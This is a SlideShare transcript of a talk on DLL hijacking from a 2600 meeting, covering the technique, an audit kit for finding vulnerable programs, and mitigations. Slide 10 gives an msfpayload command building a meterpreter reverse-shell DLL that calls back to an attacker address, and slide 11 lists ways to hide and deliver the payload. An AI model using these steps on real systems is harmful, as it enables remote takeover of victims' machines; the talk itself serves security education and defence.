Dll hijacking
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Dll hijacking

on

  • 2,024 views

DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.

DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.

Statistics

Views

Total Views
2,024
Views on SlideShare
1,668
Embed Views
356

Actions

Likes
0
Downloads
26
Comments
0

6 Embeds 356

http://www.antitree.com 287
http://www.rochester2600.com 25
http://173.255.202.215 22
http://antitree.com 12
http://10.2.2.13:8000 8
http://10.2.2.13 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Dll hijacking Presentation Transcript

  • 1. How To Become a Hijacking Terrorist
    DLL Hijacking for fun and profit
  • 2. DLL Hijacking Overview
    DLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLL
    HDM found that when opening a file associated to a program, the file will look in the local path for the referenced DLLs of the program before looking inside the correct location of the associated executable
  • 3. PCAP Example - Normal
  • 4. PCAP Example - Hijacked
  • 5. DLL Hijacking
    Old trick – new dog
    Linux removed “.” from $PATH
    Client side, WebDAV, or remote SMB share
    Widely exploitable
    Easy to detect
  • 6. DLLHijackAuditKit
    Automates the detection
    Generates test scenarios for each file extension and automatically creates an exploitable file
    Searches every extension
  • 7. Demo
  • 8. Audit.js
    Download procmon from sysinternals
    Opens procmon and filters for operations that begins with "IRP_MJ_" or "FASTIO_".
    Use WMI to query the local system and file all the possible file extensions it can handle
    Generate test cases for each file scenario. Make a dummy file with the word “Howdy…” in it named after the extension being tested
    Automatically open each file from command line
    While opening, log file system activity in procmon
    Wait a few seconds and then close out the program and try the next file
    When you get all done, you need to save the procmon file as LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL.
  • 9. Analyze.js
    Parses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll)
    Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for.
    run the file again
    if it is successful, the DLL will create a txt file named exploit.txt
    Repeat this step for each EXE and DLL pair to verify which are actively exploitable
  • 10. Real World Attack Scenario
    Generate Payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
    Rename to the DLL that the EXE is looking for
    Put the DLL in the same folder as a file with an associated extension
    Deliver file and DLL
  • 11. Tricks
    Use the Hidden attribute
    Obfuscate with lots of other files
    MSFEncode the payload
    Create a link to a subfolder
    Road Apples
    Host a SMB share on the net!
    Create a WebDAV share
  • 12. Mitigation
    Admins:
    Microsoft tool to catch illegal DLL references
    http://support.microsoft.com/kb/2264107
    CWDIllegalInDllSearch registry
    Disable WebDAV
    Disable outbound SMB (139 445)
    Developers:
    Load DLL’s securely
  • 13. References
    http://www.microsoft.com/technet/security/advisory/2269637.mspx
    http://blog.metasploit.com/2010/08/better-faster-stronger.html
  • 14. 0day (AFAIK)
    RDP .dll